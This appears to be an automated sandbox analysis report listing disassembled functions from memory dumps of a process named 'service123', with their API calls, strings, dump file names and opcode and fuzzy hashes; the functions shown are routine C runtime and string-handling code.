Opcode ID: 09e0518806547b5234e7ad815c7605e76aa95276ee98250351fbccc004a604c1
Instruction ID: 5124b3d2aeaf035c966e4b6a4444dec31218db07f912a49e9728af690b1eb532
Opcode Fuzzy Hash: 09e0518806547b5234e7ad815c7605e76aa95276ee98250351fbccc004a604c1
Instruction Fuzzy Hash: 9321CFB6A093519FD340AF29D58069EFBE4AF88658F05896EE5C887701E338D9448F83

Function 6C309530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C309549
_unlock.MSVCRT ref: 6C309571
calloc.MSVCRT ref: 6C3095BF

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 704171e4088aa9a9cbf9b9ce048f5b4fe45ad88a9bc5fa32e4ed192bd6c4b255
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 791149726053118FDB40AF29C480796BBE4BF85348F158AA9D898CF745EB35D844CFA2

Function 6C300290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C3002BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3004DE), ref: 6C3002CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3004DE), ref: 6C300300

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: f6411f139b242dcc093ce6f34f57bb8bb5cf7157e44450fc065661e1dd177e01
Instruction ID: 5a4e4f4ba22fbf3d25c5aed23d62f9822f75bde280082355c9ca5727656ce265
Opcode Fuzzy Hash: f6411f139b242dcc093ce6f34f57bb8bb5cf7157e44450fc065661e1dd177e01
Instruction Fuzzy Hash: DCF0DAB16493419FD700BF68C54A36A7EB0BB42328F504A5CE4E987A90E77A4048CF53

Function 6C38B990 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 432COMMON

Download Yara Rule

Strings

4;l, xrefs: 6C3C4FDC, 6C3C5363, 6C3C537B
H<l, xrefs: 6C3C5240
T<l, xrefs: 6C3C51F8

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: H<l$T<l$4;l
API String ID: 0-3679399429
Opcode ID: 45757c295d2389896863aac3558aefc4add3965124beb9a05f6203a1a6675cc3
Instruction ID: 38261828d6eac0b106cc5089852a2865f9b45ff87a799439965ebbd293f89ebb
Opcode Fuzzy Hash: 45757c295d2389896863aac3558aefc4add3965124beb9a05f6203a1a6675cc3
Instruction Fuzzy Hash: 68E1C7B024AB198AD7417F34C8905FEFAB1AF41648F025C2CD4D15BB11DB79894AAFC7

Function 00C14BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 00C14C27
@, xrefs: 00C14647

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 9a66aea47ff0a8ea3b8bf0891e1bb6bf9092a9530c45b9dfe950ad54bbe97285
Instruction ID: 4387ff3c727d9d5959e58c06a07c92ae7136de50b7e445a4cc1b81d3b6620adf
Opcode Fuzzy Hash: 9a66aea47ff0a8ea3b8bf0891e1bb6bf9092a9530c45b9dfe950ad54bbe97285
Instruction Fuzzy Hash: C4A1AF7550C3958BD725DF24C0907EAB7E2BF86314F148A1DE8E887342D735DA86EB82

Function 6C3052CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6C304D17
(null), xrefs: 6C3052F7

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 3ae00bd3ffd6859e1196953d4e71091b368124a2a7454f4facf397f4b6f8d0b4
Instruction ID: 9baff55b0a6bedb942ca8436dba3ba342f644ef4b37ea2065f2ddc16629ccb85
Opcode Fuzzy Hash: 3ae00bd3ffd6859e1196953d4e71091b368124a2a7454f4facf397f4b6f8d0b4
Instruction Fuzzy Hash: 99A18A7270C3958BD721DE24C09039ABBE5BF85308F148A5DE8D88B741D736DA0ACF82

Function 00C11B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00C11C20
Unknown pseudo relocation protocol version %d., xrefs: 00C11DF3
Unknown pseudo relocation bit size %d., xrefs: 00C11C6D

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: f347dd0781140a3e3d4c71296a1250718cae08413252d257b50acfe9982a3155
Instruction ID: a51cdabc63271c85eba561bc9d9075875c4d9c95db8775b6af2c3f80bc5d2a9b
Opcode Fuzzy Hash: f347dd0781140a3e3d4c71296a1250718cae08413252d257b50acfe9982a3155
Instruction Fuzzy Hash: EC81B471A042158BCB10DF28E8807EDB7F1FF8B350F188919EDA497354D334E995AB92

Function 6C2FA850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 6C2FAB43
Unknown pseudo relocation bit size %d., xrefs: 6C2FA9BD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C2FA970

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: cb5fe4ec09572857fed038f6f1db90e6c96ed624df751f7efeb5caaa058750b5
Instruction ID: 498828c1ca8cdaae73f28204bb032ab95d3a4519c1c857037d187afa94b623f7
Opcode Fuzzy Hash: cb5fe4ec09572857fed038f6f1db90e6c96ed624df751f7efeb5caaa058750b5
Instruction Fuzzy Hash: C3716D32A9520ECFDB00CF69C98179EF7B4BB45708F168529ED75ABB44D330E8468B91

Function 00C180D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00C180F2
strchr.MSVCRT ref: 00C18102
atoi.MSVCRT ref: 00C18113

Strings

., xrefs: 00C180F7

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: 8d4fcf8c60f105ff733707d63876cc5d5fc3a9047bd536c4fa65cba779557dc6
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: 9AE0E6729087015AD7407F34C90A35E75D16B42300F558D5CD48497245DB79948AB752

Function 6C309128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C309142
strchr.MSVCRT ref: 6C309152
atoi.MSVCRT ref: 6C309163

Strings

., xrefs: 6C309147

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction ID: 35a2e24319e3aa7f4b7e8aaebbc7cb784ab62652c9383610f67b8e47aea53538
Opcode Fuzzy Hash: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction Fuzzy Hash: 1EE0ECB2B047118AD7047F38C40A39AB6E5BF81308F85886CD4C897745E77DD4499B93

Function 6C309293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C30929F
GetProcAddress.KERNEL32 ref: 6C3092B3

Strings

SystemFunction036, xrefs: 6C3092A8
advapi32.dll, xrefs: 6C309298

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 04e3668aaca8206236f0fc5f7b72b2a2dd51a081a72fb113857cc50586ecde58
Instruction ID: 0cb44fd50ddb070c1966618dc3f60fb45c0e2f8e3f4f1202a26d5a5f09907544
Opcode Fuzzy Hash: 04e3668aaca8206236f0fc5f7b72b2a2dd51a081a72fb113857cc50586ecde58
Instruction Fuzzy Hash: 49E0B6B69993108BCB00BF79960605ABBF4BA06724F01496EE5C997A00E738A554CF97

Function 6C301409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C3014D2

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 1606b1524a3b4ea4c96587de3dcff6b91bf7734375bd23d04348f1a074da615c
Instruction ID: a4d3ca6c02845b38e02265840748eeb0da57a40576318ec857e4996907ad9aa8
Opcode Fuzzy Hash: 1606b1524a3b4ea4c96587de3dcff6b91bf7734375bd23d04348f1a074da615c
Instruction Fuzzy Hash: 2C22FE76A087408FC724CF69C58465AFBE1BF88308F158A2EE9D897710DB75E844CF82

Function 6C389F20 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 366COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C389FEC
memset.MSVCRT ref: 6C38A04E

Strings

8O=l0, xrefs: 6C38A200, 6C38A1F4
8O=l0, xrefs: 6C389FF1, 6C38A00D

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memset
String ID: 8O=l0$8O=l0
API String ID: 2221118986-1811934835
Opcode ID: 70471aa67095f986b5bfe2ae77b8fa4be2eff12109dffc8e3a9c52ddebe82053
Instruction ID: 9087b1be27a744c6299edc578aed138d4342bf3a2dfe670ee295f46fa53d00f9
Opcode Fuzzy Hash: 70471aa67095f986b5bfe2ae77b8fa4be2eff12109dffc8e3a9c52ddebe82053
Instruction Fuzzy Hash: 9FF1267460A3058FCB10CF29C48064AB7F5FF86318B298A5DE9598B750E732E906CFD2

Function 6C2FA340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2FA3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C30C41C), ref: 6C2FA3E0
free.MSVCRT ref: 6C2FA3EA

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 156186e903b184147b3e62f184bc5cf566f9bd88f851cdd214ac75d9819d3552
Instruction ID: 42c829a576370102b28ede95d7dce3973c4f45e79eb2e02faee82a323034f002
Opcode Fuzzy Hash: 156186e903b184147b3e62f184bc5cf566f9bd88f851cdd214ac75d9819d3552
Instruction Fuzzy Hash: E8315B7269971ECBD3009E29D48461BFBE1AFC1759F210A2CEDF487B40D3B1D4468B92

Function 6C345C40 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C345D74
memchr.MSVCRT ref: 6C345D93

Part of subcall function 6C3B8520: setlocale.MSVCRT ref: 6C3B8535

Strings

-, xrefs: 6C345F72
., xrefs: 6C345D85

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: cf1d807055fa47ade9859afc493640a4d8dec9ea8bcb40d6cbf9c3f7478165d4
Instruction ID: 8cb01dbb7a10f223910166e52f1d9650e18737f27fda9da1e50795fac31d3bea
Opcode Fuzzy Hash: cf1d807055fa47ade9859afc493640a4d8dec9ea8bcb40d6cbf9c3f7478165d4
Instruction Fuzzy Hash: 8CD103B1D093598FCB00DFA8C48468EBBF1BF49308F14862AE8A4AB755D734D945CF92

Function 6C346080 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3461AE
memchr.MSVCRT ref: 6C3461CD

Part of subcall function 6C3B8520: setlocale.MSVCRT ref: 6C3B8535

Strings

6, xrefs: 6C3463B6
., xrefs: 6C3461BF

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: 1f0b762c248dc199490406b41b6ae19dd0007eed72c7ad538947889c7c36b8bc
Instruction ID: e2fac6603023a7a4fe2ba6bb01e2c2e03700b1225a164d1734c0ee18bad8c748
Opcode Fuzzy Hash: 1f0b762c248dc199490406b41b6ae19dd0007eed72c7ad538947889c7c36b8bc
Instruction Fuzzy Hash: 14D137B19097599FCB00DFA8C48068EBBF5BF88314F148A2AE8A4E7751D734D945CF92

Function 6C3C0F90 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3C0FD5

Strings

basic_string::append, xrefs: 6C3C104D, 6C3C1059, 6C3C114C, 6C3C120C

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 88d0e907cf4501cdb8e2f78209eb4093c9a5034a120f59dc0243f9ccd2a4a3bb
Instruction ID: f856d43fd127e436d034fa6f51afa1905275ce23eb463ac1b72cb55ba4afcb66
Opcode Fuzzy Hash: 88d0e907cf4501cdb8e2f78209eb4093c9a5034a120f59dc0243f9ccd2a4a3bb
Instruction Fuzzy Hash: 4DA159B5A042048FCB00EF69C58469EBBF4FF89314F118969E8988B744E734E849CF93

Function 6C35B2D0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C35997F), ref: 6C35B336
memcpy.MSVCRT(?,?,?,?,?,?,6C35997F), ref: 6C35B3A1
memcpy.MSVCRT(00000000,?,?,6C35997F), ref: 6C35B3E8

Strings

basic_string::assign, xrefs: 6C35B403

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: d0d1992d30139a233bd4ddee5d67bbda23401a7a32a790de09dcb89cf93f2528
Instruction ID: bcbd5ee7ca160830f1a3cf8e5621e2c1ed6802a790a305fba936b758193fd23f
Opcode Fuzzy Hash: d0d1992d30139a233bd4ddee5d67bbda23401a7a32a790de09dcb89cf93f2528
Instruction Fuzzy Hash: 4C5188B1B0A6118BD714DF29C484A5EFBE5FF8530CB90866DE4858B728E731D915CF82

Function 6C364410 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C364471
memcpy.MSVCRT ref: 6C3644DF
memcpy.MSVCRT ref: 6C364518

Strings

basic_string::assign, xrefs: 6C364534

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 18cc1e6d74429fb1ce571777fb734a5a91c41fa668ef4a92e28090ffec2d14a3
Instruction ID: 3c5f4f993d562bbdb007091607b016d0dce2e5db235d5adc9083310f7c9ea966
Opcode Fuzzy Hash: 18cc1e6d74429fb1ce571777fb734a5a91c41fa668ef4a92e28090ffec2d14a3
